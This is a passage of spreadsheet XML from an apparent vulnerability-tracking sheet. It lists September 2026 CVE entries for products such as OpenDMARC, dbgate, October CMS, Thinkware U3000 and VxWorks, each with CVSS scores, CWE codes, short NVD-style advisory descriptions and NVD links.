      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>CWE-259</t>
        </is>
      </c>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t>Dell Live Optics Collector, versions prior to 27.2.13.310, contain(s) a Use of Hard-coded Password vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information exposure.</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70413</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94282</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in libXi's XI2 enter/leave/focus cookie conversion in libXi before 1.8.4 could be used by malicious X server to crash an attached X client.</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94282</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101005</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in October CMS up to 4.3.4. This affects the function validateExternalImageHost of the file System/Classes/ResizeImages.php of the component SSRF Protection. The manipulation results in server-side request forgery. The attack may be launched remotely. The exploit is now public and may be used. Upgrading to version 4.3.5 is able to mitigate this issue. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101005</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101013</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. Affected is an unknown function of the file updateresultdetails.php. Such manipulation of the argument editid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101013</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101014</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-193</t>
        </is>
      </c>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Trusted Domain Project OpenDMARC up to 1.4.2. Affected by this vulnerability is the function opendmarc_util_cleanup in the library libopendmarc/opendmarc_util.c of the component DMARC Record Parser. Performing a manipulation results in off-by-one. The attack may be initiated remotely. The exploit is now public and may be used. The patch is named b3b1da9264bc80324094a27c71e7369bdedc62ae. To fix this issue, it is recommended to deploy a patch.</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101014</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101016</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Trusted Domain Project OpenDMARC up to 1.4.2. This affects the function opendmarc_policy_parse_dmarc in the library libopendmarc/opendmarc_policy.c. The manipulation of the argument fo/rf/ri/pct/sp/adkim/aspf/rua/ruf leads to handling of exceptional conditions. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101016</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101017</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Trusted Domain Project OpenDMARC up to 1.4.2. This vulnerability affects the function strcasecmp in the library libopendmarc/opendmarc_policy.c. The manipulation results in handling of exceptional conditions. The attack can be executed remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101017</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101035</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in aligungr UERANSIM up to 3.3.0. This affects the function DecodePlainMmMessage in the library src/lib/nas/encode.cpp of the component nr-gnb. Executing a manipulation can lead to uncaught exception. The attack can be launched remotely. The exploit has been published and may be used. This patch is called 1ae9bf2062b57595dbcbc4bc1d0a0ccf06815bac. It is best practice to apply a patch to resolve this issue.</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101035</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101052</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>CWE-259, CWE-798</t>
        </is>
      </c>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in refly-ai refly up to 1.1.0. This issue affects some unknown processing of the file apps/api/src/modules/config/app.config.ts of the component JWT Token Handler. The manipulation with the input test leads to hard-coded credentials. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101052</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101053</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-284</t>
        </is>
      </c>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Thinkware U3000 up to 1.02.04. This impacts the function PUT_FILE of the file /tmp/wpa_supplicant.conf of the component TCP Service. Executing a manipulation of the argument path can lead to improper access controls. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101053</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101055</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Thinkware U3000 up to 1.02.04. Affected by this vulnerability is the function GET_STATUS of the component TCP Service. The manipulation of the argument wifi_info results in information disclosure. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101055</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101068</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in dbgate up to 7.3.1. This impacts the function zipJsonLinesData of the file packages/api/src/utility/zipJsonLinesData.js of the component Create Connection Endpoint. Performing a manipulation of the argument filePath results in path traversal. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. PR #1530 / commit 5f99b4d82 (7.2.5) hardened other export endpoints with checkSecureExportFilePath but omitted this endpoint. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101068</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101069</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="inlineStr"/>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr"/>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S224" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in dbgate up to 7.3.1. Affected is the function exportModelSql of the file packages/api/src/controllers/databaseConnections.js of the component Export Handler. Executing a manipulation of the argument outputFile can lead to path traversal. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101069</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102005</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>0bf9931a-6ebf-4f48-bd14-39ee5e1d61f8</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="inlineStr"/>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S225" s="5" t="inlineStr">
        <is>
          <t>Wind River VxWorks 7 24.03 through 26.03, a memory leak occurs under specific, non-default configuration states when processing specific service routines, causing the system to terminate operations before releasing allocated memory pools. Fixed in VxWorks 7 26.09</t>
        </is>
      </c>
      <c r="T225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102005</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102006</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>0bf9931a-6ebf-4f48-bd14-39ee5e1d61f8</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr"/>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S226" s="5" t="inlineStr">
        <is>
          <t>In Wind River VxWorks 7 prior to 26.09, specific system call arguments can result in the process management subsystem failing to properly release allocated kernel memory before terminating the calling application. Fixed in Version 26.09</t>
        </is>
      </c>
      <c r="T226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102006</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94284</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="inlineStr"/>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S227" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read vulnerability in libX11's XIM trigger-key registration parser in libX11 before 1.8.14 could be used by malicious X servers to crash attached X clients.</t>
        </is>
      </c>
      <c r="T227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94284</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94287</t>
        </is>
      </c>
